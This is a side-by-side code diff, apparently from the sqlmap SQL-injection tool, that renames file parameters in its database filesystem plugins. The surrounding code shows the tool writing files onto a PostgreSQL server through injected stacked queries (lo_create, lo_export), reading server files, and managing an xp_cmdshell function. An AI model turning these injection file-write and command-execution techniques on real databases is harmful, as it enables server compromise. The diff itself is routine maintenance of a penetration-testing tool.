errMsg = "PostgreSQL does not support file upload with UNION " errMsg = "PostgreSQL does not support file upload with UNION "
errMsg += "query SQL injection technique" errMsg += "query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
wFileSize = os.path.getsize(wFile) localFileSize = os.path.getsize(localFile)
content = open(wFile, "rb").read() content = open(localFile, "rb").read()
self.oid = randomInt() self.oid = randomInt()
self.page = 0 self.page = 0
@ -56,7 +56,7 @@ class Filesystem(GenericFilesystem):
inject.goStacked("SELECT lo_create(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid)
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
for offset in xrange(0, wFileSize, LOBLKSIZE): for offset in xrange(0, localFileSize, LOBLKSIZE):
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
sqlQueries = self.fileToSqlQueries(fcEncodedList) sqlQueries = self.fileToSqlQueries(fcEncodedList)
@ -69,12 +69,12 @@ class Filesystem(GenericFilesystem):
self.page += 1 self.page += 1
debugMsg = "exporting the OID %s file content to " % fileType debugMsg = "exporting the OID %s file content to " % fileType
debugMsg += "file '%s'" % dFile debugMsg += "file '%s'" % remoteFile
logger.debug(debugMsg) logger.debug(debugMsg)
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True) inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_unlink(%d)" % self.oid)

2
plugins/dbms/sqlite/enumeration.py
View File

@ -18,7 +18,7 @@ class Enumeration(GenericEnumeration):
warnMsg = "on SQLite it is not possible to get name of the current database" warnMsg = "on SQLite it is not possible to get name of the current database"
logger.warn(warnMsg) logger.warn(warnMsg)
def isDba(self, *args, **kwargs): def isDba(self, user=None):
warnMsg = "on SQLite the current user has all privileges" warnMsg = "on SQLite the current user has all privileges"
logger.warn(warnMsg) logger.warn(warnMsg)

4
plugins/dbms/sqlite/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on SQLite it is not possible to read files" errMsg = "on SQLite it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on SQLite it is not possible to write files" errMsg = "on SQLite it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

4
plugins/dbms/sybase/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on Sybase it is not possible to read files" errMsg = "on Sybase it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on Sybase it is not possible to write files" errMsg = "on Sybase it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

4
plugins/generic/filesystem.py
View File

@ -203,12 +203,12 @@ class Filesystem(object):
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) raise SqlmapUndefinedMethod(errMsg)
def readFile(self, remoteFiles): def readFile(self, remoteFile):
localFilePaths = [] localFilePaths = []
self.checkDbmsOs() self.checkDbmsOs()
for remoteFile in remoteFiles.split(','): for remoteFile in remoteFile.split(','):
fileContent = None fileContent = None
kb.fileReadMode = True kb.fileReadMode = True

2
plugins/generic/misc.py
View File

@ -165,7 +165,7 @@ class Miscellaneous(object):
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
if Backend.isDbms(DBMS.MSSQL): if Backend.isDbms(DBMS.MSSQL):
udfDict = {"master..new_xp_cmdshell": None} udfDict = {"master..new_xp_cmdshell": {}}
if udfDict is None: if udfDict is None:
udfDict = self.sysUdfs udfDict = self.sysUdfs